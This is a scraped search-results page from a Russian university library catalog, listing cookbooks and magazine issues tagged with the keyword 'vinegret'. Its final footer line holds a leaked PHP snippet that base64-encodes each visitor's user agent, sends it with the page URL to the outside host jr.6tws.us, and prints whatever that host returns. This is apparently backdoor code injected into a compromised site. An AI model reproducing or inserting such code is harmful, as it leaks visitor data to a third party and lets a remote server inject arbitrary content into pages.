Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

123 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ВИНЕГРЕТ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 15
1. 
Кулинария [Текст] / П. В. Абатуров [и др.] ; дар. В. С. Михайленко, 1955. - 959, [1] с.
Держатели документа (Информация об экземплярах) 
2. 
Салаты и закуски [Текст] / сост. О. А. Воротникова ; дар. В. А. Козлова, 1995. - 395, [1] с.
Держатели документа (Информация об экземплярах) 
3. 
Авроров, Валерий Александрович. Традиционные народные технологии приготовления пищи из натуральных продуктов [Текст] / В. А. Авроров, Н. В. Моряхина, Н. Д. Тутов, 2017. - 287 с.
Держатели документа (Информация об экземплярах) 

Приведены рецепты различных скоромных и постных блюд, холодных и горячих закусок, салатов, саусов, маринадов, напитков, выпечки, сладких блюд, пасхи, мороженого и др., приготовляемых в домашних условиях.

Даны рекомендации по достижению вкусовых качеств блюд.

Предлагаемые рецепты блюд были хорошо известны в свое время, а некоторые из них и сегодня используются на предприятиях общественного питания.

Для всех приведенных рецептов характерно использование только натурального и высококачественного растительного и животного пищевого сырья и полуфабрикатов.

Учебное пособие предназначено для студентов вузов, обучающихся по направлениям "Технология продукции и организация общественного питания", "Продукты питания из растительного сырья".

4. 
Могилевская, Софья Абрамовна. Девочки, книга для вас! [Текст] / С. А. Могилевская, 1974. - 438 с.
5. 
Огонек. - Журнал, 2011г. № 20
Оглавление 
  • Журенков, Кирилл. Бумажный угар / К. Журенков, Е. Барышева, М. Епифанова. - с.4-5
  • Куксин, Григорий. Потуши себе сам / Г. Куксин. - с.5
  • Мещеряков, Сергей. 3300 рублей / С. Мещеряков. - с.7
  • Мещеряков, Сергей. Защита от свободы / С. Мещеряков. - с.7
  • Коротич, Виталий Алексеевич. "Надо менять свободу" / В. А. Коротич. - с.8-9
  • Шапран, Андрей. Дожить до берета / А. Шапран. - с.10-12
  • Орешкин, Дмитрий. Вертикаль смысла / Д. Орешкин. - с.14-15
  • Шергина, Наталья. Третий пошел / Н. Шергина. - с.16-17
  • Зайцев, Вадим. Слой среди своих / В. Зайцев, К. Урбан. - с.18-19
  • Калныш, Валерий. Битва за Кучму / В. Калныш. - с.20-21
  • Лукьянов, Федор. Люди, которые создают проблемы / Ф. Лукьянов. - с.22-23
  • Козичев, Евгений. 10 самых важных решений G6, G7 и G8 / Е. Козичев. - с.24
  • Барбан, Ефим. Прийтись ко дворцу / Е. Барбан. - с.25
  • Бейдер, Владимир. Революция: перевод с арабского / В. Бейдер. - с.26-27
  • День рождения бессмертного. - с.28-29
  • Делеринс, Гелия. На кухню, граждане! / Г. Делеринс. - с.30-33
  • Особенности национальной охоты. - с.32-33
  • Радулова, Наталья. Рынок уходит в небо / Н. Радулова. - с.34-35
  • Красильникова, Марина. "В нас засела культура "бедного потребления"" / М. Красильникова. - с.36
  • Кудрявцева, Елена. Война на низшем уровне / Е. Кудрявцева. - с.38-40
  • Иванова, Наталья. В меру Достоевский / Н. Иванова. - с.42-44
  • Дарденн, Жан Пьер. "Мы хотим сделать людей больными" / Ж. П. Дарденн, Л. Дарденн. - с.45
  • Бычков, Василий. "Города превратились в винегрет" / В. Бычков. - с.46
  • Беляев, Александр. Фан или пропал / А. Беляев. - с.48-49
  • Делеринс, Гелия. Листья мира / Г. Делеринс. - с.50
Держатели документа (Информация об экземплярах) 
6. 
Преступление и наказание. - Журнал, 2011г. № 9
Оглавление 
  • Александров, Юрий. Внедрение международных стандартов - веление времени / Ю. Александров. - с.2-3
  • Быстрицкая, Наталия. Оценка - "ближе к четверке" / Н. Быстрицкая, В. Грибов. - с.4-5
  • Трофимов, Валерий Юрьевич. Дорога с двухсторонним движением / В. Ю. Трофимов. - с.6-7
  • Датий, А. Система социальных лифтов в действии / А. Датий, Е. Данилин, А. Макеев. - с.8-9
  • Хальзунов, Алексей. Даешь квартиру! Тогда мы идем к вам / А. Хальзунов. - с.10-12
  • Верещагин, Валерий. Чувствовать уверенность в завтрашнем дне / В. Верещагин. - с.12-13
  • Грищенко, Е. Тогда и служится хорошо... / Е. Грищенко. - с.14-15
  • Канатеев, А. Здоровье - это главное! / А. Канатеев. - с.16
  • Размыслов, Николай. "Прибавка" для покупки жилья / Н. Размыслов. - с.17
  • Ларин, Алексей. Чтоб нервишки не шалили / А. Ларин. - с.17
  • Комлева, Марина. Не моды ради... / М. Комлева. - с.18
  • Шишелов, Григорий. Интернет приходит в колонии / Г. Шишелов. - с.19
  • УФСИН России по Смоленской области. - с.20-25
  • Казберов, П. Как нейтрализовать лидера? / П. Казберов. - с.26-28
  • Челышева, Ирина. Индивидуально, конкретно, эффективно / И. Челышева. - с.29-30
  • Мальцева, Елена. Про "винегрет", "марафон" и, главное - про танец! / Е. Мальцева. - с.31-33
  • Кардаш, Наталья. Самоубийцы / Н. Кардаш. - с.34-35
  • Чтобы не было "ЧП". - с.36-37
  • Суховая, Надежда. Мир из песка / Н. Суховая. - с.38
  • Гейзер, Инна. Островок экзотики на Южном Урале / И. Гейзер. - с.38
  • Астахов, Роман. Славянское единство / Р. Астахов. - с.39
  • Исаева, Людмила. Снова - здорово / Л. Исаева. - с.39
  • Яковлев, Руслан. Хан взял след / Р. Яковлев. - с.40
  • Лупанова, Ирина. Краповый берет теперь у "Барсов" / И. Лупанова. - с.40
  • Адамов, Андрей. Кличко обещал вернуться / А. Адамов. - с.41
  • Мороз, Мария. Ветеран УИС стал чемпионом / М. Мороз. - с.41
  • Соболева, Татьяна. В МВК идут работы по перепрофилированию в воспитательный центр / Т. Соболева. - с.42
  • Порохина, Ирина. Поймать удачу на крючок / И. Порохина. - с.42
  • Толстоброва, Лина. Музыка их связала / Л. Толстоброва. - с.43
  • Александров, Юрий. Знаменосец / Ю. Александров. - с.44
  • Гейзер, Инна. Бесстрашная девушка / И. Гейзер. - с.45
  • Ларин, Алексей. Дигитли: сельхозпоселение в шишкинских местах / А. Ларин. - с.46-47
  • Литвинова, Людмила. [Газета "Под знаменем присяги" УФСИН России по Тульской области] / Л. Литвинова. - с.48
  • Вьюркова, А. Подарку каждый рад / А. Вьюркова. - с.48
  • Алексеева, Л. Воля к победе / Л. Алексеева. - с.49
  • Вьюркова, А. Работать на результат / А. Вьюркова. - с.49
  • Полякова, Е. "Я человек мирный... " / Е. Полякова. - с.50
  • Тома, Ани. Не все так просто... / А. Тома. - с.52-54
  • Что грозит Брейвику?. - с.54-55
  • Эно, Ричард. 17 лет за поджог тюрьмы / Р. Эно. - с.56
  • Камерун. 100 заключенных на 12 квадратных метров. - с.57-58
  • Бельгия - Нидерланды. Проблемы тюрьмы "Тилбург". - с.58-59
  • Грибов, Юрий. Дорогой Никита Сергеевич... / Ю. Грибов. - с.60-61
  • Любитель пирамид. - с.62-63
  • Учанский, Игорь. Фильмы о тюрьме и ее обитателях / И. Учанский. - с.64
Держатели документа (Информация об экземплярах) 
7. 
Богушева, Валентина Ивановна. Технология приготовления пищи [Текст] / В. И. Богушева, 2010. - 374, [1] с.
Держатели документа (Информация об экземплярах) 

В пособии представлен весь комплекс теоретических основ производства продукции общественного питания.

Дана характеристика химического состава и физических свойств различных продуктов. Рассмотрены основные способы и приемы первичной обработки сырья и приготовления полуфабрикатов. Характеризуются приемы тепловой обработки, а также изменения, происходящие в продуктах под влиянием высоких температур.

Основная часть пособия посвящена технологии приготовления кулинарных блюд, правилам их оформления и подачи.

Особое внимание обращается на требования, предъявляемые к качеству продукции общественного питания, срокам ее хранения и реализации.

В последних главах освещаются вопросы лечебного и детского питания, дается характеристика различных диет.

Предназначено для студентов технологических, торгово-экономических, кооперативных колледжей и техникумов. Он может представлять интерес и для практических работников, обучающихся в системе переподготовки кадров и повышения квалификации.

8. 
Кулинарные рецепты [Текст] / сост. Л. И. Воробьева, 1983. - 835 с.
Ключевые слова 
БУТЕРБРОД -- САЛАТ -- ВИНЕГРЕТ -- ЗАКУСКА ХОЛОДНАЯ -- ЗАКУСКА ОВОЩНАЯ -- ЗАКУСКА ИЗ ЯИЦ -- СОУС -- ЗАКУСКА ГОРЯЧАЯ -- БУЛЬОН -- СУП -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- МЯСО ОТВАРНОЕ -- МЯСО ТУШЕНОЕ -- МЯСО ЖАРЕНОЕ -- МЯСО РУБЛЕНОЕ -- МЯСО ЗАПЕЧЕННОЕ -- РЫБА ОТВАРНАЯ -- РЫБА ЖАРЕНАЯ -- РЫБА ТУШЕНАЯ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МОЛОЧНЫЕ -- БЛЮДА ИЗ ЯИЦ -- ОМЛЕТ -- ОВОЩИ ОТВАРНЫЕ -- ОВОЩИ ЖАРЕНЫЕ -- ОВОЩИ ЗАПЕЧЕННЫЕ -- ОВОЩИ ТУШЕНЫЕ -- ОВОЩИ ФАРШИРОВАННЫЕ -- БЛЮДА ИЗ ГРИБОВ -- КАША -- ПЛОВ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ БОБОВЫХ -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО ПРЕСНОЕ -- ТЕСТО СЛОЕНОЕ -- БЛИНЫ -- ОЛАДЬИ -- БУЛОЧКИ -- КУЛИЧИ -- ПЕЧЕНЬЕ -- ПИРОЖНЫЕ -- ТОРТ -- КЕКС -- КИСЕЛЬ -- КОМПОТ -- ЖЕЛЕ -- КРЕМ -- ПУДИНГ -- КОНСЕРВИРОВАНИЕ ДОМАШНЕЕ -- МАРИНАД -- ЗАМОРАЖИВАНИЕ ОВОЩЕЙ -- ЗАМОРАЖИВАНИЕ ПЛОДОВ
Держатели документа (Информация об экземплярах) 
9. 
Сборник рецептур блюд и кулинарных изделий для предприятий общественного питания [Текст] / сост. Л. Е. Голунова, 2001. - 688 с.
Ключевые слова 
БУТЕРБРОД -- ЗАКУСКА БАНКЕТНАЯ -- САЛАТ -- ВИНЕГРЕТ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СОЛЯНКА -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- КАША -- ЗАПЕКАНКА -- ПУДИНГ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- ЯГОДЫ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- САМБУК -- КРЕМ -- СЛИВКИ ВЗБИТЫЕ -- СУФЛЕ -- ПУДИНГ -- МОРОЖЕНОЕ -- НАПИТКИ -- ЧАЙ -- КОФЕ -- КАКАО -- ШОКОЛАД -- МОЛОКО -- КОКТЕЙЛЬ -- КРЮШОН -- БЛЮДА МУЧНЫЕ -- ФАРШ -- РАСХОД СЫРЬЯ -- ПОЛУФАБРИКАТЫ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
10. 
Шарыгин, Игорь Федорович. Математический винегрет / И. Ф. Шарыгин, 1991. - 64 с.
Держатели документа (Информация об экземплярах) 
11. 
Романова Т. В. Приятного аппетита! [Текст] / Т. В. Романова, 1990. - 200 с. [8] вкл. цв. л. с.
Ключевые слова 
КУЛИНАРИЯ ДОМАШНЯЯ -- ПИТАНИЕ РАЦИОНАЛЬНОЕ -- СЕРВИРОВКА СТОЛА -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКА -- БУТЕРБРОД -- САЛАТ -- ВИНЕГРЕТ -- СУПЫ -- ЩИ -- БОРЩ -- РАССОЛЬНИК -- СУП - ПЮРЕ -- СУП МОЛОЧНЫЙ -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- БЛЮДА МУЧНЫЕ -- БЛЮДА СЛАДКИЕ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- КРЕМ -- КАША ГУРЬЕВСКАЯ -- НАПИТКИ -- ТЕСТО ДРОЖЖЕВОЕ -- ПИРОГ -- ТЕСТО СЛОЕНОЕ -- МАННИК -- КЕКС -- ХВОРОСТ -- ПЕЧЕНЬЕ -- ПИРОЖНЫЕ -- ТОРТ -- ФРУКТЫ -- ОВОЩИ -- КУХНЯ ОМСКАЯ -- ЗЕЛЬЦ -- СТУДЕНЬ -- СТЕРЛЯДЬ -- ЩУКА -- ВЕРЕЩАКА -- ПЕЛЬМЕНИ -- ПАСХА
Держатели документа (Информация об экземплярах) 
12. 
Сопина Л. Н. Пособие для повара [Текст] / Л. Н. Сопина, 2000. - 240 с.
Ключевые слова 
ОРГАНИЗАЦИЯ ПРОИЗВОДСТВА -- ПИТАНИЕ ОБЩЕСТВЕННОЕ -- ОБРАБОТКА ПРОДУКТОВ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА КАРТОФЕЛЯ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКОВ -- ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ -- БЛЮДА ХОЛОДНЫЕ -- БЛЮДА ГОРЯЧИЕ -- ЗАКУСКА -- БУТЕРБРОД -- ВИНЕГРЕТ -- СУП -- БУЛЬОН -- СУП ОВОЩНОЙ -- СУП КАРТОФЕЛЬНЫЙ -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА МЯСНЫЕ -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ ОВОЩЕЙ -- СОУС -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА СЛАДКИЕ -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО БЕЗДРОЖЖЕВОЕ -- БРАКЕРАЖ
Держатели документа (Информация об экземплярах) 
13. 
Сборник рецептур блюд и кулинарных изделий для предприятий общественного питания [Текст] / сост.: Л. Е. Голунова, М. Т. Лабзина, 2014. - 771 с.
Ключевые слова 
БУТЕРБРОД -- ЗАКУСКА БАНКЕТНАЯ -- САЛАТ -- ВИНЕГРЕТ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СОЛЯНКА -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- КАША -- ЗАПЕКАНКА -- ПУДИНГ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- ЯГОДЫ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- САМБУК -- КРЕМ -- СЛИВКИ ВЗБИТЫЕ -- СУФЛЕ -- ПУДИНГ -- МОРОЖЕНОЕ -- НАПИТКИ -- ЧАЙ -- КОФЕ -- КАКАО -- ШОКОЛАД -- МОЛОКО -- КОКТЕЙЛЬ -- КРЮШОН -- БЛЮДА МУЧНЫЕ -- ФАРШ -- РАСХОД СЫРЬЯ -- ПОЛУФАБРИКАТЫ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
14. 
Татарская Л. Л. Кулинария и организация производства детского питания [Текст] / Л. Л. Татарская, Н. Г. Бутейкис, 1981. - 336 с.
Ключевые слова 
ПИТАНИЕ ДЕТЕЙ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ -- СУП -- БУЛЬОН -- СУП - ПЮРЕ -- СУП МОЛОЧНЫЙ -- СУП ХОЛОДНЫЙ -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- КАША -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- ТЕСТО -- БЛЮДА ХОЛОДНЫЕ -- САЛАТ -- ВИНЕГРЕТ -- БУТЕРБРОД -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- КОМПОТ -- ВСКАРМЛИВАНИЕ ЕСТЕСТВЕННОЕ -- ВСКАРМЛИВАНИЕ ИСКУССТВЕННОЕ -- ВСКАРМЛИВАНИЕ СМЕШАННОЕ -- ПИТАНИЕ ДЕТЕЙ ГРУДНЫХ -- ПИТАНИЕ ЛЕЧЕБНОЕ ДЕТСКОЕ -- ПИЩЕБЛОК ДЕТСКОГО ПИТАНИЯ -- БРАКЕРАЖ -- МЕНЮ
Держатели документа (Информация об экземплярах) 
15. 
Сидорина Е. И. Современная кухня [Текст] : кулинар. рецепты из доступ. продуктов / Е. И. Сидорина, 1993. - 543 с.
Ключевые слова 
СЕРВИРОВКА СТОЛА -- ЗАКУСКА ХОЛОДНАЯ -- САЛАТ -- ВИНЕГРЕТ -- ПАШТЕТ -- ЗАЛИВНОЕ -- БУТЕРБРОД -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ РЫБЫ -- СЫР -- БЛЮДА ИЗ ЯИЦ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СУП ОВОЩНОЙ -- УХА -- СУП МОЛОЧНЫЙ -- СУП ГРИБНОЙ -- БЛИНЫ -- ОЛАДЬИ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- ЗАПЕКАНКА -- ПЛОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- СОУС -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО СЛОЕНОЕ -- ТОРТЫ -- ТЕСТО БИСКВИТНОЕ -- ПЕЧЕНЬЕ -- ХВОРОСТ -- ВАФЛИ -- КЕКС -- ПИРОГ -- КРЕМ МАСЛЯНЫЙ -- КРЕМ БЕЛКОВЫЙ -- КРЕМ ЗАВАРНОЙ -- МУСС -- ЖЕЛЕ -- КОМПОТ -- КИСЕЛЬ -- БЛЮДА СЛАДКИЕ -- ЗАГОТОВКИ -- КАПУСТА КВАШЕНАЯ -- КОНСЕРВИРОВАНИЕ -- МАРИНОВАНИЕ -- ВАРЕНЬЕ -- ДЖЕМ -- ЦУКАТЫ


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3056 - 22.10.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.86 с.16 запросов, 0.43c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;